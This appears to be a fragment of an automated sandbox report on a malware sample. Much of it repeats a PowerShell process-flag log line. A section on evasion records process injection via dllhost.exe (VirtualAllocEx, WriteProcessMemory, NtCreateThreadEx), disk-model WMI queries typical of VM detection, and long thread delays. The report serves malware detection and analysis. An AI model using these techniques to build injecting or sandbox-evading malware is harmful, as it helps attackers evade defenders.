Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,7_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5703Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4152Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2078Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 650Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6767Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7593Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 492Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 1216Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1640Jump to behavior
Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 1143Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1172Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8794Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 410Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1553Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1224Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1695Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1651Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1691Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1595Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1486Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1761Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3368
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1770Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1771Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 467Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 442Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 446Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 440Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1580Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1580Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1540Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1624Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1588Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1337Jump to behavior
